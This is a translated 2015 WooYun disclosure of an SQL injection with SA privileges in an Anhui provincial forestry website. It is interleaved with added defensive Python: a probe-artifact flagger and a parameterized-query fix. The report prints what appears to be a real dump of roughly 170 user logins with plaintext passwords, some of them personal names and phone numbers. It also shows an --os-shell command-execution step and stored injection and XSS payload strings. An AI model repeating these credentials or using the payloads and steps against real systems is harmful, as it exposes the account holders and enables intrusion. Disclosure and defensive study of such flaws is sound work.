Vulnerability summary

Defect ID: wooyun-2015-0119667

Title: SQL injection in an Anhui Province information site (SA privileges)

Related vendor: cncert (National Internet Emergency Center)

Author: 萨瓦迪卡

Submitted: 2015-06-11 15:50

Fixed: 2015-07-27 09:42

Published: 2015-07-27 09:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-06-11: Details reported to the vendor; awaiting vendor handling
2015-06-12: Vendor confirmed; details disclosed to the vendor only
2015-06-22: Details disclosed to core white hats and domain experts
2015-07-02: Details disclosed to regular white hats
2015-07-12: Details disclosed to intern white hats
2015-07-27: Details disclosed to the public

Brief description:

There was also a file upload vulnerability before this one, but it has already been fixed...

Detailed description:

The Anhui Provincial Forestry Information Network is deployed across the province's cities. It has a serious SQL injection vulnerability, and the database connection runs with SA privileges, so operating system commands can be executed. A large amount of forestry database information from the cities could be leaked.

Proof of vulnerability:

Databases of the individual cities:

[screenshot 1.png]


Current database:

[screenshot 2.png]


Database: netweb_ahly
[47 tables]
+-----------------------+
| D99_CMD |
| D99_REG |
| D99_Tmp |
| Elook_Setup |
| H_Dict_Data |
| H_Service_Function |
| H_Service_Info |
| H_Service_ItemFile |
| H_Service_ItemFile |
| H_Service_ItemType |
| H_Site_AccessingTotal |
| H_Site_AccessingTotal |
| H_Site_Advertising |
| H_Site_Base |
| H_Site_Comment |
| H_Site_Down |
| H_Site_Function |
| H_Site_Info |
| H_Site_LinkAdd |
| H_Site_LinkType |
| H_Site_Mail |
| H_Site_Message |
| H_Site_ModelInfo |
| H_Site_ModelRes |
| H_Site_ModelType |
| H_Site_Research_Item |
| H_Site_Research_Item |
| H_System_Columns |
| H_System_GroupPurview |
| H_System_InfoPass |
| H_System_Orgn |
| H_System_Purview |
| H_System_Quanxian |
| H_System_Tables |
| H_System_UserGroup |
| H_System_UserGroup |
| H_System_WeiWen |
| H_service_dept |
| M_Site_Content |
| M_System_DeriveId |
| S3_Tmp |
| SB_Enterprise |
| SB_Item |
| SB_shangbao |
| count_value |
| dtproperties |
| t_jiaozhu |
+-----------------------+


Table data

Database: netweb_ahly
Table: SB_Enterprise
[419 entries]
+--------------------------------+----------------------------------------+
| loginName | password |
+--------------------------------+----------------------------------------+
[22:18:13] [WARNING] console output will be trimmed to last 256 rows due to large table size
| yxk19591226 | yxk19591226 |
| jzlywh | yzf1234csx5678 |
| 天涯海角 | zhm664088 |
| 周德贵 | zhou7573222 |
| 270923932 | zhouyichao |
| keer_zhou8888 | zk800815 |
| zqf513658 | zqf147258369 |
| TLSTGSSLGY | zwj123123zwj |
| QDfEwF_username | ZxMDFw_password |
| mj_hailou | 000000 |
| 操乐明 | 000333 |
| 372564470 | 05585560218 |
| xnlyuy | 05597518303 |
| hqy | 100001 |
| 1111 | 1111 |
| test | 111111 |
| 112233 | 112233 |
| chushujie | 118649 |
| ZZQ654321 | 119119 |
| 冯瑞强 | 123456 |
| ahlygk | 123456@ |
| 一江小道 | 123456789 |
| 高明GM | 123456gm |
| mango | 1234asdf |
| zhoushihua | 13085602880 |
| nmssysm | 1314520 |
| chen1397 | 13979595621 |
| 石桥步生态特种养殖场 | 173528 |
| thzj | 19621003 |
| lgp1972 | 19721017 |
| gaoshanyangzhi | 19830311 |
| 13856688439 | 19840705 |
| 946081787 | 19861210aa |
| ldyq1314 | 19920223jsawyk |
| liuchenhui | 199209 |
| -999' OR Asc(1)=-1 OR '1'='2 | 2024-12-20 |
| hz8749007 | 25188 |
| czslyj | 2812528 |
| czslyj | 3057987 |
| bengbu | 3115969 |
| 水东林业站 | 3260119 |
| 天上星星 | 328328 |
| ganzhiquan | 342523 |
| chly | 369369 |
| anipyh | 3841347g |
| 414603191 | 414603191 |
| fxl.5532308 | 523878 |
| nyh999 | 551268 |
| 安徽省雪灵仙药业有限公司 | 5520685 |
| 746212246 | 5567766300 |
| jhy580515 | 580501 |
| tljqlyj733 | 5822733 |
| wuhu | 5851822 |
| 我爱家乡 | 585855 |
| lalyzl | 591015 |
| xujipu | 6080257 |
| dfdxah | 641020 |
| czstcl | 664496 |
| 2012XQ | 666666 |
| hnslyj | 6678346 |
| nishangxiaoyu | 670523 |
| fnly | 6767300 |
| XUXUSHENG | 691229 |
| stevenlun | 7026971 |
| kuaile | 716894 |
| yeying | 717825 |
| xiong68731 | 733733 |
| wangzicheng | 7696577 |
| 谢名曙 | 771123 |
| ZXB66003773 | 777507 |
| 840805531 | 789246 |
| HFGD | 795057026 |
| Cassandra | 7WEe9W6B |
| ahsbbwdyy | 8021111 |
| 管店林业总场 | 8041004 |
| linder | 82881225 |
| huqibo | 8315183 |
| bmstangyilin | 8461407 |
| tangjun | 8755192 |
| oxoxoxoxoxoxox.com | 88888 |
| 后悔 | 891104 |
| masys | 9115522wan |
| liusong | 950404 |
| tongjun | 961211961211 |
| bizhiguo | 9701014 |
| xqmcdsjx | acUn3t1x |
| admin'='admin'-- - | admin |
| admin | admin') or 'a'='a'-- |
| Samir | aeVeINPx |
| 绿城园林 | aj0540 |
| gbrkvl | amx21phW |
| atestu_username | atestu_password |
| atestu_username' or 'a'='b'-- | atestu_password' or 'a'='b'-- |
| atestu_username" or "a"="b"-- | atestu_password" or "a"="b"-- |
| Billybob | b6y8IuX1 |
| bbszlk | bb1234 |
| yyu115 | bsf2911253 |
| gjnunartu | bx0Zge4z |
| bzlyys | bz342126 |
| cbh1207 | cbh147258369 |
| ceshi | ceshi |
| 525166 | chen |
| loxqkc | cjf845xk |
| crystal100 | crystal100 |
| huadong1977 | czh19771003 |
| GTYled_username | EdSTzs_password |
| Latricia | EKFvcFUH |
| afan | fdxzhj |
| wndqikw1z | g00dPa$$w0rD |
| 1 | g00dPassw0rD1 |
| Welcome | hFBRuOAQ |
| GqJhKY_username" or "a"="b"-- | hxTsHc_password" or "a"="b"-- |
| oykthpglucd | IN7Rt5DS |
| Jalia | iOPfY6gK |
| Nash | JV8ZXp6E |
| Dhadhanqirawandt | jVJTvv8x |
| kjq088 | kjq12310329 |
| flyoawloykj | L3UAB7Ml |
| huyaqin19811025 | lgn661208 |
| liuzhen01215 | LIUzhen01215 |
| liwei407687678 | liwei7481214 |
| 李磊 | ll25656022565419ll |
| rundong | lwd906 |
| suzhou | lyjcyz |
| Qzqoch_username | nBLaqV_password |
| cadmaria | nhfd24155832 |
| Suzyn | NsKEy1Ax |
| rvjuKM_username' or 'a'='b'-- | obkPAa_password' or 'a'='b'-- |
| YvqEPF_username' or 'a'='b'-- | OoewFQ_password' or 'a'='b'-- |
| pinggu2013 | pinggu2013 |
| Simone | POTOWOmP |
| vnRtaT_username | pZCJef_password |
| xNAKSj_username" or "a"="b"-- | qCKdUD_password" or "a"="b"-- |
| qinerdong | qinqiong2hannuo |
| Sxkseq_username" or "a"="b"-- | QsBELf_password" or "a"="b"-- |
| Avari | qvfP0agu |
| ahaqzx | qwerty |
| 153577222162 | r1c551 |
| BdOguH_username" or "a"="b"-- | RjMSar_password" or "a"="b"-- |
| gRdtQG_username | ROiWTC_password |
| root | root |
| 835839452 | s123456 |
| Ice | SPDpk0Zn |
| kwechtomfkv | Ss8gOZrw |
| hOAUPT_username | tDwxcl_password |
| test | test |
| Christiana | TO6ckuh0 |
| tux | tux |
| gyxsof_username' or 'a'='b'-- | TZLPUJ_password' or 'a'='b'-- |
| gZbYio_username" or "a"="b"-- | UHCVSQ_password" or "a"="b"-- |
| Carmelita | uu25B5Zg |
| xcgWew_username' or 'a'='b'-- | uxQygE_password' or 'a'='b'-- |
| Marlie | vcJCobJ7 |
| Abdul | WBz3BSwP |
| ahhbly | wfxb73 |
| wfz1978 | wfz610625 |
| <blank> | wmfkjlbf9 |
| gcfhbwsm | wsm003426 |
| wsx1234 | wsx1234 |
| wumt | wumt022670 |
| Cfldjc_username' or 'a'='b'-- | xDSUaJ_password' or 'a'='b'-- |
| <blank> | XSStest" onmouseover=alert(4384)// x=" |
| xgcaFO_username' or 'a'='b'-- | YCiIVl_password' or 'a'='b'-- |
| IGescB_username" or "a"="b"-- | YClHoX_password" or "a"="b"-- |
| Lynn | YCUuLY4n |
| 宁国奕盛力 | yishengli |
| yahbbzx | YRV0fnuz |
| ngyishengli | ysl4675777 |
| yutian1973 | yutian1973 |
+--------------------------------+----------------------------------------+
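Several rows in the dump above are not credentials anyone chose: the `_username`/`_password` pairs with `' or 'a'='b'--` appended, the `XSStest" onmouseover=alert(4384)// x="` value and `admin'='admin'-- -` look like the residue of earlier automated probing of the registration or login form that was stored as account records. Before the affected accounts are reset, a defender would want to separate such probe artifacts from real users. The following Python script is an added example and not part of the original report: it parses a two-column sqlmap-style dump (including the wrapped rows visible above, where the closing `|` spilled onto the following line) and flags rows whose values match common injection or XSS probe patterns. The sample dump, its database name and every login/password value in it are constructed for the example.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample in the sqlmap-style pipe-table layout seen in the report.
# The third data row is deliberately wrapped across two lines, with the closing
# "|" on the next line, reproducing the artefact visible on the page. All names
# and values here are invented for the example, not copied from the real dump.
SAMPLE_DUMP = """\
Database: demo_db
Table: SB_Enterprise
[6 entries]
+------------------------------+------------------------------+
| loginName                    | password                     |
+------------------------------+------------------------------+
[22:18:13] [WARNING] console output will be trimmed to last 256 rows due to large table size
| alice                        | s3cret                       |
| bob                          | 123456                       |
| 示例林场                      | 173528
|
| demo_username' or 'a'='b'--  | demo_password' or 'a'='b'--  |
| <blank>                      | XSStest" onmouseover=alert(1)// x=" |
| admin'='admin'-- -           | admin                        |
+------------------------------+------------------------------+
"""


def parse_sqlmap_table(text: str) -> List[Tuple[str, str]]:
    """Return (loginName, password) pairs from a two-column sqlmap dump.

    A data line that lacks its closing "|" is treated as a wrapped row and
    joined with the following line before the cells are split.
    """
    rows: List[Tuple[str, str]] = []
    pending: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:
            line = pending + " " + line
            pending = None
        if not line.startswith("|"):
            continue                      # borders, headers, sqlmap log lines
        if not line.endswith("|"):
            pending = line                # wrapped row: wait for its tail
            continue
        cells = [c.strip() for c in line[1:-1].split("|")]
        if len(cells) != 2 or cells == ["loginName", "password"]:
            continue
        rows.append((cells[0], cells[1]))
    return rows


# Patterns suggesting a stored value is an injection or XSS probe rather than a
# credential a person chose, each with the reason reported for it.
ARTIFACT_PATTERNS = [
    (re.compile(r"""['"]\s*or\s*['"]""", re.IGNORECASE), "quote-OR tautology"),
    (re.compile(r"--\s*-?$"), "trailing SQL comment marker"),
    (re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE), "HTML event handler attribute"),
    (re.compile(r"\balert\s*\(", re.IGNORECASE), "script alert() call"),
    (re.compile(r"_(username|password)\b", re.IGNORECASE), "scanner placeholder credential"),
]


def flag_artifacts(rows: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (loginName, reasons) for rows whose login or password matches
    any artifact pattern; rows that look like ordinary credentials are not reported."""
    flagged: List[Tuple[str, List[str]]] = []
    for login, password in rows:
        reasons = set()
        for value in (login, password):
            for pattern, reason in ARTIFACT_PATTERNS:
                if pattern.search(value):
                    reasons.add(reason)
        if reasons:
            flagged.append((login, sorted(reasons)))
    return flagged


if __name__ == "__main__":
    for login, reasons in flag_artifacts(parse_sqlmap_table(SAMPLE_DUMP)):
        print(f"{login!r}: {', '.join(reasons)}")
```

Rows the script flags are evidence of who probed the form and when (if the table carries timestamps), and they should be deleted rather than "reset"; the remaining rows are the real accounts whose plaintext passwords were exposed. Storing the passwords in plaintext at all is a second defect the dump makes visible, independent of the injection.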


--os-shell

[screenshot 3.png]


ipconfig

[screenshot 4.png]


net user

[screenshot 5.png]


Fix recommendation:

Filter malicious characters out of the parameters;

Copyright notice: when reposting, please credit the source 萨瓦迪卡@乌云
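Filtering characters is a weaker fix than keeping user input out of the SQL text altogether. As an added example that is not part of the original report, the following Python shows the flawed concatenation pattern next to a parameterized query and runs the same input through both. The standard-library sqlite3 module stands in for the SQL Server the site evidently runs (an assumption made so the example runs offline; the `?` placeholders play the role of bound parameters in ADO.NET or ODBC). The table name follows the dump above; the account rows are constructed, and the tautology string used in the comparison is one of the values stored in the dumped table.

```python
import sqlite3
from typing import Tuple

# Constructed demo credentials; the table name follows the one seen in the dump.
DEMO_ROWS = [("demo_user", "demo_pass_9x"), ("demo_admin", "demo_adm_4q")]


def make_db() -> sqlite3.Connection:
    """In-memory sqlite3 database standing in for the site's SQL Server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE SB_Enterprise (loginName TEXT, password TEXT)")
    conn.executemany("INSERT INTO SB_Enterprise VALUES (?, ?)", DEMO_ROWS)
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Flawed pattern: the submitted strings become part of the SQL text,
    so quotes and comment markers inside them change the query's structure."""
    sql = (
        "SELECT COUNT(*) FROM SB_Enterprise "
        "WHERE (loginName = '%s' AND password = '%s')" % (login, password)
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_param(conn: sqlite3.Connection, login: str, password: str) -> bool:
    """Fixed pattern: the SQL text is constant and the values are bound as
    parameters, so they can only ever be compared as data."""
    sql = (
        "SELECT COUNT(*) FROM SB_Enterprise "
        "WHERE (loginName = ? AND password = ?)"
    )
    return conn.execute(sql, (login, password)).fetchone()[0] > 0


def compare(login: str, password: str) -> Tuple[bool, bool]:
    """Feed one input through both versions; returns (concat_result, param_result)."""
    conn = make_db()
    try:
        return login_concat(conn, login, password), login_param(conn, login, password)
    finally:
        conn.close()


if __name__ == "__main__":
    for login, password in [
        ("demo_user", "demo_pass_9x"),        # valid credentials
        ("demo_user", "wrong"),               # wrong password
        ("zz", "admin') or 'a'='a'--"),       # value seen stored in the dumped table
    ]:
        print(f"{login!r}/{password!r}: concat={compare(login, password)[0]}, "
              f"param={compare(login, password)[1]}")
```

The concatenated version accepts `admin') or 'a'='a'--` as a password because the `--` comments out the rest of the statement and the `or 'a'='a'` makes the WHERE clause true for every row; the parameterized version compares the same text as a literal string and rejects it. Character filtering is fragile (encodings, and second-order injection from values such as the ones already stored in this table), so treat it as defence in depth behind parameterization. Separately, the `--os-shell` step in the proof relies on the application's database login having sysadmin rights; on SQL Server, `SELECT IS_SRVROLEMEMBER('sysadmin')` run as the application login should return 0, and that login should hold only the permissions the site needs.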


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-06-12 09:41

Vendor reply:

Duplicate vulnerability; will not be handled again

Latest status:

None